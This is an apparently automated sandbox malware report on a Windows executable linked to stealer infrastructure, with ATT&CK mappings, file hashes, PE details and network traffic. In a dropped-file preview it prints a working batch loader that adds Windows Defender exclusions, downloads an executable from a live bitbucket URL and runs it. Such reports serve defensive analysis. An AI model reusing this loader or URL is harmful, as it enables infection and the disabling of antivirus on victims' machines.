        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information11
        Scripting
        Valid Accounts1
        Native API
        11
        Scripting
        11
        Process Injection
        1
        Disable or Modify Tools
        OS Credential Dumping11
        Security Software Discovery
        Remote Services1
        Archive Collected Data
        11
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        PowerShell
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        21
        Virtualization/Sandbox Evasion
        LSASS Memory1
        Process Discovery
        Remote Desktop ProtocolData from Removable Media1
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
        Process Injection
        Security Account Manager21
        Virtualization/Sandbox Evasion
        SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Obfuscated Files or Information
        NTDS1
        Application Window Discovery
        Distributed Component Object ModelInput Capture3
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA Secrets2
        File and Directory Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        Gq48hjKhZf.exe56%VirustotalBrowse
        Gq48hjKhZf.exe39%ReversingLabs
        Gq48hjKhZf.exe100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        NameIPActiveMaliciousAntivirus DetectionReputation
        bitbucket.org
        185.166.143.48
        truefalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exefalse
            high
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            185.166.143.48
            bitbucket.orgGermany
            16509AMAZON-02USfalse
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1580296
            Start date and time:2024-12-24 08:56:02 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 4m 38s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:12
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:Gq48hjKhZf.exe
            renamed because original name is a hash value
            Original Sample Name:454bf064c19d363b154a419fc69dc693.exe
            Detection:MAL
            Classification:mal88.evad.winEXE@12/12@1/1
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 24
            • Number of non-executed functions: 38
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
            • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtCreateKey calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            TimeTypeDescription
            02:56:54API Interceptor67x Sleep call for process: powershell.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            185.166.143.48http://bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txtGet hashmaliciousUnknownBrowse
            • bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txt
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            bitbucket.org2oM46LNCOo.exeGet hashmaliciousLummaCBrowse
            • 185.166.143.50
            tTGxYWtjG5.exeGet hashmaliciousLummaCBrowse
            • 185.166.143.48
            iaLId0uLUw.exeGet hashmaliciousLummaCBrowse
            • 185.166.143.50
            yuij5p5p3W.exeGet hashmaliciousLummaCBrowse
            • 185.166.143.50
            NAnOVCOt4L.exeGet hashmaliciousLummaCBrowse
            • 185.166.143.50
            fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
            • 185.166.143.48
            OtHVIQ2ge4.exeGet hashmaliciousLummaCBrowse
            • 185.166.143.49
            fr2Mul3G6m.exeGet hashmaliciousLummaCBrowse
            • 185.166.143.49
            payment_3493.pdfGet hashmaliciousUnknownBrowse
            • 185.166.143.48
            FBmz85HS0d.exeGet hashmaliciousLummaCBrowse
            • 185.166.143.50
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            AMAZON-02US2oM46LNCOo.exeGet hashmaliciousLummaCBrowse
            • 185.166.143.50
            tTGxYWtjG5.exeGet hashmaliciousLummaCBrowse
            • 185.166.143.48
            iaLId0uLUw.exeGet hashmaliciousLummaCBrowse
            • 185.166.143.50
            yuij5p5p3W.exeGet hashmaliciousLummaCBrowse
            • 185.166.143.50
            sh4.nn.elfGet hashmaliciousOkiruBrowse
            • 54.171.230.55
            mipsel.nn.elfGet hashmaliciousOkiruBrowse
            • 54.171.230.55
            armv5l.elfGet hashmaliciousUnknownBrowse
            • 35.163.11.216
            splm68k.elfGet hashmaliciousUnknownBrowse
            • 3.138.165.134
            nklarm7.elfGet hashmaliciousUnknownBrowse
            • 3.115.112.216
            splarm7.elfGet hashmaliciousUnknownBrowse
            • 3.116.167.193
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            3b5074b1b5d032e5620f69f9f700ff0esingl6.mp4.htaGet hashmaliciousLummaCBrowse
            • 185.166.143.48
            hnskdfgjgar22.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
            • 185.166.143.48
            Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
            • 185.166.143.48
            Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
            • 185.166.143.48
            WO.exeGet hashmaliciousMetasploitBrowse
            • 185.166.143.48
            ChoForgot.exeGet hashmaliciousVidarBrowse
            • 185.166.143.48
            payment_3493.pdfGet hashmaliciousUnknownBrowse
            • 185.166.143.48
            1lhZVZx5nD.exeGet hashmaliciousStealc, VidarBrowse
            • 185.166.143.48
            Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
            • 185.166.143.48
            acronis recovery expert deluxe 1.0.0.132.rarl.exeGet hashmaliciousLummaCBrowse
            • 185.166.143.48
            No context
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):64
            Entropy (8bit):0.34726597513537405
            Encrypted:false
            SSDEEP:3:Nlll:Nll
            MD5:446DD1CF97EABA21CF14D03AEBC79F27
            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
            Malicious:false
            Reputation:high, very likely benign file
            Preview:@...e...........................................................
            Process:C:\Users\user\Desktop\Gq48hjKhZf.exe
            File Type:ASCII text, with CRLF, LF line terminators
            Category:dropped
            Size (bytes):347
            Entropy (8bit):5.290067082162046
            Encrypted:false
            SSDEEP:6:NS0o++AI4eGgdEYzPs++AIIzVr+fxiA8q2pPKB++AI4eGgdEEFACp+tXzp3:NS9EsuUUEVr+ZiRsBEsuEJUtjN
            MD5:16E1A923C995AA08BDF178EF8DEE95D4
            SHA1:271758F6726EA175CC31F4845810E348B8CA75DB
            SHA-256:E54DCAAC4D1D94F6596EC6BB97D9D86E48C8C55C4F4130651D78CFEF49262C54
            SHA-512:62A8A2EFB82D78780417E3693B89EFC4C05592DF28C4490FD1B6A1B81E2D0FF50A07809CE2BCF06B0755BA79C1CC903B3EBD456B87385D0614AE545C8C0F8434
            Malicious:true
            Yara Hits:
            • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat, Author: Joe Security
            Reputation:low
            Preview:@shift /0..@echo off.powershell /nop /com "Add-MpPreference -ExclusionPath %TEMP%".powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', '%TEMP%\AHPOBS.exe')";.powershell /nop /com "Add-MpPreference -ExclusionProcess %TEMP%\AHPOBS.exe".cmd.exe /c %TEMP%\AHPOBS.exe;..
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            File type:PE32+ executable (GUI) x86-64, for MS Windows
            Entropy (8bit):6.461642473177525
            TrID:
            • Win64 Executable GUI (202006/5) 92.64%
            • Win64 Executable (generic) (12005/4) 5.51%
            • Generic Win/DOS Executable (2004/3) 0.92%
            • DOS Executable Generic (2002/1) 0.92%
            • VXD Driver (31/22) 0.01%
            File name:Gq48hjKhZf.exe
            File size:123'392 bytes
            MD5:454bf064c19d363b154a419fc69dc693
            SHA1:98beb972b52d32c846e9e485cbf17e9211cbe5ab
            SHA256:6a46b3762d71b47d0c728e967ee9129f523689ff70196a953baa3f60c85a26b5
            SHA512:4c87c628a5b8123faf35c9ef072e91463024f3429ee00998753bca58c77d34f31fd4b55afca7e4a4f25dff837e6db72df59f13f27430b1c16c0c13845b4e6df7
            SSDEEP:3072:kV3J6kkt5h1X+HqTi0BW69hd1MMdxPe9N9uA0/+hL9TBfnP8B:Jt5hBPi0BW69hd1MMdxPe9N9uA069TBc
            TLSH:24C3276AB2E01198EBF581F6D5920746EB7074321715A3DB5B7863B31B2B8C58F3D3A0
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...E.@]........../....2.b...|.................@.............................0.............................................
            Icon Hash:90cececece8e8eb0
            Entrypoint:0x140001000
            Entrypoint Section:.code
            Digitally signed:false
            Imagebase:0x140000000
            Subsystem:windows gui
            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
            DLL Characteristics:
            Time Stamp:0x5D400545 [Tue Jul 30 08:52:21 2019 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:7182b1ea6f92adbf459a2c65d8d4dd9e
            Instruction
            dec eax
            sub esp, 28h
            dec ecx
            mov eax, 00000160h
            dec eax
            xor edx, edx
            dec eax
            mov ecx, 40020444h
            add dword ptr [eax], eax
            add byte ptr [eax], al
            call 00007FA7DCEC9448h
            dec eax
            xor ecx, ecx
            call 00007FA7DCEC9446h
            dec eax
            mov dword ptr [0001F420h], eax
            dec ebp
            xor eax, eax
            dec eax
            mov edx, 00001000h
            dec eax
            xor ecx, ecx
            call 00007FA7DCEC9433h
            dec eax
            mov dword ptr [0001F3FFh], eax
            dec eax
            mov eax, 4001F090h
            add dword ptr [eax], eax
            add byte ptr [eax], al
            dec eax
            mov dword ptr [0001F43Eh], eax
            call 00007FA7DCED446Ah
            call 00007FA7DCED40F9h
            call 00007FA7DCED0220h
            call 00007FA7DCECF813h
            call 00007FA7DCECF0A2h
            call 00007FA7DCECED71h
            call 00007FA7DCECE468h
            call 00007FA7DCECD91Fh
            call 00007FA7DCEC9542h
            call 00007FA7DCED2405h
            call 00007FA7DCED0C64h
            dec eax
            mov edx, 4001F032h
            add dword ptr [eax], eax
            add byte ptr [eax], al
            dec eax
            lea ecx, dword ptr [0001F3C6h]
            call 00007FA7DCED4492h
            dec eax
            mov ecx, FFFFFFF5h
            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x1f1980xc8.data
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x220000x630.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d0000x10d4.pdata
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x1f6a80x448.data
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .code0x10000x5a990x5c00bf90681e6a2fc3ae2cafaa536804f308False0.3649796195652174data5.470810722545147IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .text0x70000x105b50x106008a1a401c4bd106ea802d83f827d2ddd2False0.4909798425572519data6.359859898514709IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata0x180000x4b3d0x4c00546e073a6443174d5e09f21ab6d487ceFalse0.6635999177631579VAX-order 68k Blit mpx/mux executable6.6666895682624485IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .pdata0x1d0000x10d40x1200e81bd35fde0f70c926459e823327da76False0.4683159722222222data4.881026996790752IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0x1f0000x23180x1600607c61f631092ad3ff4000c586299685False0.32848011363636365data4.298511113489139IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc0x220000x6300x800fc2c7c1a0f7df25abface4beeca1c3d9False0.53125data5.902828763075756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            NameRVASizeTypeLanguageCountryZLIB Complexity
            RT_RCDATA0x2221c0x1very short file (no magic)9.0
            RT_RCDATA0x222200xezlib compressed data1.5714285714285714
            RT_RCDATA0x222300xcdata1.6666666666666667
            RT_RCDATA0x2223c0x151data1.032640949554896
            RT_MANIFEST0x223900x2a0XML 1.0 document, ASCII text, with very long lines (672), with no line terminators0.5520833333333334
            DLLImport
            msvcrt.dllmemset, wcsncmp, memmove, wcsncpy, wcsstr, _wcsnicmp, _wcsdup, free, _wcsicmp, wcslen, wcscpy, wcscmp, memcpy, tolower, wcscat, malloc
            KERNEL32.dllGetModuleHandleW, HeapCreate, GetStdHandle, HeapDestroy, ExitProcess, WriteFile, GetTempFileNameW, LoadLibraryExW, EnumResourceTypesW, FreeLibrary, RemoveDirectoryW, GetExitCodeProcess, EnumResourceNamesW, GetCommandLineW, LoadResource, SizeofResource, FreeResource, FindResourceW, GetShortPathNameW, GetSystemDirectoryW, EnterCriticalSection, CloseHandle, LeaveCriticalSection, InitializeCriticalSection, WaitForSingleObject, TerminateThread, CreateThread, Sleep, WideCharToMultiByte, HeapAlloc, HeapFree, LoadLibraryW, GetProcAddress, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameW, GetEnvironmentVariableW, SetEnvironmentVariableW, GetCurrentProcess, TerminateProcess, RtlLookupFunctionEntry, RtlVirtualUnwind, RemoveVectoredExceptionHandler, AddVectoredExceptionHandler, HeapSize, MultiByteToWideChar, CreateDirectoryW, SetFileAttributesW, GetTempPathW, DeleteFileW, GetCurrentDirectoryW, SetCurrentDirectoryW, CreateFileW, SetFilePointer, TlsFree, TlsGetValue, TlsSetValue, TlsAlloc, HeapReAlloc, DeleteCriticalSection, GetLastError, SetLastError, UnregisterWait, GetCurrentThread, DuplicateHandle, RegisterWaitForSingleObject
            SHELL32.DLLShellExecuteExW, SHGetFolderLocation, SHGetPathFromIDListW
            WINMM.DLLtimeBeginPeriod
            OLE32.DLLCoInitialize, CoTaskMemFree
            SHLWAPI.DLLPathAddBackslashW, PathRenameExtensionW, PathQuoteSpacesW, PathRemoveArgsW, PathRemoveBackslashW
            USER32.DLLCharUpperW, CharLowerW, MessageBoxW, DefWindowProcW, GetWindowLongPtrW, GetWindowTextLengthW, GetWindowTextW, EnableWindow, DestroyWindow, UnregisterClassW, LoadIconW, LoadCursorW, RegisterClassExW, IsWindowEnabled, GetSystemMetrics, CreateWindowExW, SetWindowLongPtrW, SendMessageW, SetFocus, CreateAcceleratorTableW, SetForegroundWindow, BringWindowToTop, GetMessageW, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, DestroyAcceleratorTable, PostMessageW, GetForegroundWindow, GetWindowThreadProcessId, IsWindowVisible, EnumWindows, SetWindowPos
            GDI32.DLLGetStockObject
            COMCTL32.DLLInitCommonControlsEx
            TimestampSource PortDest PortSource IPDest IP
            Dec 24, 2024 08:56:59.540290117 CET49730443192.168.2.4185.166.143.48
            Dec 24, 2024 08:56:59.540338039 CET44349730185.166.143.48192.168.2.4
            Dec 24, 2024 08:56:59.540430069 CET49730443192.168.2.4185.166.143.48
            Dec 24, 2024 08:56:59.679124117 CET49730443192.168.2.4185.166.143.48
            Dec 24, 2024 08:56:59.679153919 CET44349730185.166.143.48192.168.2.4
            Dec 24, 2024 08:57:01.445928097 CET44349730185.166.143.48192.168.2.4
            Dec 24, 2024 08:57:01.446033955 CET49730443192.168.2.4185.166.143.48
            Dec 24, 2024 08:57:01.449378014 CET49730443192.168.2.4185.166.143.48
            Dec 24, 2024 08:57:01.449393034 CET44349730185.166.143.48192.168.2.4
            Dec 24, 2024 08:57:01.449750900 CET44349730185.166.143.48192.168.2.4
            Dec 24, 2024 08:57:01.491242886 CET49730443192.168.2.4185.166.143.48
